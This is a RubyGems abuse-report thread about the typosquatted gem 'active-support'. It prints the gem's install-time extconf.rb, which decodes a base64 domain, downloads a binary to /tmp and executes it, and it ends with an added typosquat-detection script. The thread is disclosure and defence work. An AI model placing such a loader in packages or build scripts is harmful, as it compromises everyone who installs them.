Reporting Abuse on active-support

Guilherme Ramos

09 Aug, 2018 02:10 AM

This seems like a bogus gem.
Uses a very similar name to a very popular gem.
Description seems off.

Installation gives

Fetching gem metadata from https://rubygems.org/.....
Resolving dependencies...
Fetching active-support 5.2.0
Installing active-support 5.2.0 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

current directory:
/redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0/ext/trellislike/unflaming/waffling
/redacted/.rvm/rubies/ruby-2.4.4/bin/ruby -r ./siteconf20180809-44989-1mvw31o.rb extconf.rb
extconf.rb:27:in `run': undefined method `install_exploit' for Smectis:Class (NoMethodError)
Did you mean? install_explot
from extconf.rb:31:in `<main>'

extconf failed, exit code 1

Gem files will remain installed in /redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0 for
inspection.
Results logged to
/redacted/.rvm/gems/ruby-2.4.4/extensions/x86_64-darwin-17/2.4.0/active-support-5.2.0/gem_make.out

An error occurred while installing active-support (5.2.0), and Bundler cannot continue.
Make sure that `gem install active-support -v '5.2.0' --source 'https://rubygems.org/'` succeeds
before bundling.

In Gemfile:
  active-support

  1. 1 Posted by Sam Giffney on 09 Aug, 2018 02:15 AM

    Further investigation shows definite malware behaviour.

    The gem duplicates the official activesupport (no hyphen) code but adds a compiled extension.

    active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb
    attempts to resolve a base64 encoded domain, download a payload and execute.

    require 'net/http'
    require 'uri'
    require 'base64'
    require 'resolv'

    class Smectis
      def self.install_explot(weighership)
        if !weighership.nil? and weighership != '0.0.0.0'
          educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
          File.open('/tmp/autosymbiontic', 'wb+') do |uterometer|
            uterometer.binmode
            uterometer.write(educable.body)
            uterometer.chmod(0777)
            uterometer.close
          end
          system('/tmp/autosymbiontic')
        end
      end

      def self.run()
        milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
        jaunting = nil
        begin
          jaunting = Resolv.getaddress(Base64.decode64(milligram))
        rescue
        end
        self.install_exploit(jaunting)
      end
    end

    Smectis.run()

  2. 2 Posted by Patrick Figel on 09 Aug, 2018 12:15 PM

    Probably the same thing with this gem from the same user: https://rubygems.org/gems/deamons

  3. Support Staff 3 Posted by David Radcliffe on 09 Aug, 2018 01:10 PM

    Thanks for the report. We have removed the gem.

  4. David Radcliffe closed this discussion on 09 Aug, 2018 01:10 PM.
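
A check that could be run over Gemfile entries before installing, as an added example that is not part of the original thread: it flags names that differ from a known gem only by separators (as with active-support and activesupport) or by a single edit (as with deamons). The POPULAR list and all function names are assumptions made for illustration.

```ruby
# Added example: flag dependency names that shadow well-known gems.
# POPULAR is a small constructed list; in practice, load the set of gems
# you actually intend to depend on.
POPULAR = %w[activesupport activerecord daemons nokogiri rack rails].freeze

# Collapse the separators that look-alike names commonly add or drop.
def canonical(name)
  name.downcase.gsub(/[-_]/, '')
end

# Optimal string alignment distance: insert, delete, substitute and
# adjacent transposition each cost 1.
def osa_distance(a, b)
  d = Array.new(a.size + 1) { |i| [i] + [0] * b.size }
  (0..b.size).each { |j| d[0][j] = j }
  (1..a.size).each do |i|
    (1..b.size).each do |j|
      cost = a[i - 1] == b[j - 1] ? 0 : 1
      d[i][j] = [d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost].min
      if i > 1 && j > 1 && a[i - 1] == b[j - 2] && a[i - 2] == b[j - 1]
        d[i][j] = [d[i][j], d[i - 2][j - 2] + 1].min
      end
    end
  end
  d[a.size][b.size]
end

# Returns { suspicious_name => [known_gem, reason] }.
def typosquat_suspects(names, popular = POPULAR)
  names.each_with_object({}) do |name, hits|
    next if popular.include?(name) # exact match is the intended gem
    popular.each do |known|
      if canonical(name) == canonical(known)
        hits[name] = [known, :separator_variant]
      elsif osa_distance(canonical(name), canonical(known)) == 1
        hits[name] ||= [known, :one_edit_away]
      end
    end
  end
end

# Constructed input: the first two names are the gems reported in the
# thread, the rest are made up for the demonstration.
if __FILE__ == $PROGRAM_NAME
  p typosquat_suspects(%w[active-support deamons rails nokogiri rackk])
end
```

A hit is a prompt to inspect the gem (author, description, presence of an `ext/` directory with an `extconf.rb`) before installing, since extension build scripts run at install time.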
